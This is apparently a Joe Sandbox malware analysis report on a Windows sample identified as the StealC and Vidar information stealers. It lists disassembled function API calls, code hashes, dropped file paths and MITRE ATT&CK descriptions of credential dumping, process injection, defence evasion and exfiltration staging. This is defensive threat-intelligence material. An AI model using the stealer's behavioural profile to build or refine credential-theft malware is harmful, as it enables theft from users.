API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 83b14d8013d4da83b9c040a5c552a9a93fb4a540fb32c06869e663b0d0be2929
Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
Opcode Fuzzy Hash: 83b14d8013d4da83b9c040a5c552a9a93fb4a540fb32c06869e663b0d0be2929
Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A

Function 00419660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041967B

Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08

OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
CloseHandle.KERNEL32(00000000), ref: 00419766

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
Opcode Fuzzy Hash: 82399361bd33b1cf0f2f2efae6d7ff06a364100a0860e5f280d97042be913252
Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56

Function 00418950 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
wsprintfA.USER32 ref: 004189E0

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

%dx%d, xrefs: 004189D7

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5

Function 00417B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
wsprintfA.USER32 ref: 00417B83

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5

Function 61EAF6D0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 61EAF6F5
__dllonexit.MSVCRT ref: 61EAF733
_unlock.MSVCRT ref: 61EAF763
_onexit.MSVCRT ref: 61EAF777

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
Instruction ID: d8116788f2c50d2f41c70b1de34e9b41b7999a481f31fa547576aa82505b99b8
Opcode Fuzzy Hash: 14a068eb5279b83cbe249a705044353e42ef401f74677ddee49b1cb2808ff91a
Instruction Fuzzy Hash: 7D1155B5A197418FCB40EF74D48455EBBE0AB89254F618D2EE4E5CB350E738D5848B82

Function 6CFAAC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?), ref: 6CFE2D19
GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6CFE2D49
GetProcAddress.KERNEL32(SymGetLineFromInlineContextW), ref: 6CFE2D7C
GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6CFE2E0A

Strings

SymGetLineFromInlineContextW, xrefs: 6CFE2D71

Memory Dump Source

Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: SymGetLineFromInlineContextW
API String ID: 2190909847-3625368168
Opcode ID: 03b0bc8d7b08642bab6e480bbb51f94955d0eddeac5071487935af69b38bd567
Instruction ID: ccb973f01f13ecc1aab84d6ac4304cd0402a533a971854e8c8757e1a046e9b6d
Opcode Fuzzy Hash: 03b0bc8d7b08642bab6e480bbb51f94955d0eddeac5071487935af69b38bd567
Instruction Fuzzy Hash: C011B271A05306BBDB048F19C884B8ABBF8EB89364F00852DFA54D3750E7B2D9008BD2

Function 00413E2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

q?A, xrefs: 00413ED2

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: q?A
API String ID: 3840410801-4084695119
Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report b4s45TboUL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Change of critical system settings

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CFIEGDAE

C:\ProgramData\CGIEGHJEGHJKFIEBFHJK

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\HIIDGCGCBF.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_b4s45TboUL.exe_a589bf60d6b7d122a21ee24c88f3e8c47bc93e3_7b0b69e2_79af984d-a0ed-4b6e-97d7-779edc4d5bb2\Report.wer

Windows Analysis Report
b4s45TboUL.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

